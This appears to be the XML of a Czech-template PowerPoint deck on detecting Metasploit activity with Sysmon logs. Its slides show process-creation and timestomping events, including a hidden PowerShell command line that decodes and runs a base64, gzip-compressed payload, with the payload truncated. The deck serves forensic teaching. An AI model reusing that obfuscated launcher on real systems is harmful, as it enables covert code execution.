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73" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="-10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7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57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61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07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05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11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85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6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9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1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5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2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2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2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4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7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27B582-17D0-458D-969F-23D2DD15947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0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4D6EE6-0174-4142-9BD6-390B0B7F2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D6539AA-8BBF-4BF5-A015-6DD11ED909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1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C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="728227"/>
            <a:ext cx="10515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"Process Create:</a:t>
            </a:r>
          </a:p>
          <a:p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RuleName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UtcTime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2019-03-26 21:14:44.276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Image: C:\Windows\System32\conhost.exe</a:t>
            </a:r>
          </a:p>
          <a:p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FileVersion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10.0.17134.1 (WinBuild.160101.0800)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 Console Window Host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Product: Microsoft? Windows? Operating System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Company: Microsoft Corporation</a:t>
            </a:r>
          </a:p>
          <a:p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CommandLine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\??\C:\WINDOWS\system32\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conhost.exe 0xffffffff -ForceV1</a:t>
            </a:r>
          </a:p>
          <a:p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CurrentDirectory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C:\WINDOWS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User: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PC2\user</a:t>
            </a:r>
          </a:p>
          <a:p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IntegrityLevel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High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Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
            </a:r>
          </a:p>
          <a:p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ParentImage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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
            </a:r>
          </a:p>
          <a:p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ParentCommandLine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""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powershell.exe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"" -noni -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nop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-w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hidden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-c &amp;([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scriptblock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]::create((New-Object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IO.StreamReader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(New-Object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IO.Compression.GzipStream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((New-Object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IO.MemoryStream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,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/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BrreYUTFCgAA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'))),[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IO.Compression.CompressionMode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]::Decompress))).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ReadToEnd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()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-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Sysmon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/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: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ProcessCreate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)";"System.Collections.ObjectModel.ReadOnlyCollection`1[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System.String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]";"System.Collections.Generic.List`1[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System.Diagnostics.Eventing.Reader.EventProperty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]"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Nadpis 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766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5926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POWERSHELL PROCESS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70452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C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="728227"/>
            <a:ext cx="105156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"File creation time changed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>RuleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>UtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-03-26 21:14:43.489</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 5620</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>powershell.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>TargetFilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CreationUtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-02-18 07:25:45.895</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PreviousCreationUtcTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>FileCreateTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>System.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>]";"System.Collections.Generic.List`1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>]"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Nadpis 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766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5926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>METASPLOIT PROCESS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341915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C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="728227"/>
            <a:ext cx="105156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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CurrentDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\WINDOWS\system32\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User: PC2\user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LogonGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LogonId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 0x33832</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>TerminalSessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>IntegrityLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: High</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentProcessGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentProcessId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: 7660</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: C:\Users\user\Desktop\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>putty_x64.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ParentCommandLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ProcessCreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>System.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>]";"System.Collections.Generic.List`1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>]"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Nadpis 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766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5926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>METASPLOIT PROCESS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274148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4.bp.blogspot.com/-yoe0lGHrHLk/Wc1Jx2Q6ooI/AAAAAAAABA8/-e75oChj3zYPj9v_hf_Gaa0j5lM1XoBkwCLcBGAs/s1600/Win%2B10%2Bfixed.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6059BDFC-DCC0-4C24-AB1C-F0626C63F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020" y="969408"/>
            <a:ext cx="8374380" cy="462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597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axa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a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TM03457496[[fn=Paralaxa]]</Template>
  <TotalTime>383</TotalTime>
  <Words>625</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Širokoúhlá obrazovka</PresentationFormat>
  <Paragraphs>38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Paralaxa</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>POWERSHELL PROCESS</vt:lpstr>
      <vt:lpstr>METASPLOIT PROCESS</vt:lpstr>
      <vt:lpstr>METASPLOIT PROCESS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Michael Jurek</dc:creator>
  <cp:lastModifiedBy>Michael Jurek</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-12T19:49:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-13T02:12:35Z</dcterms:modified>
</cp:coreProperties>
</file>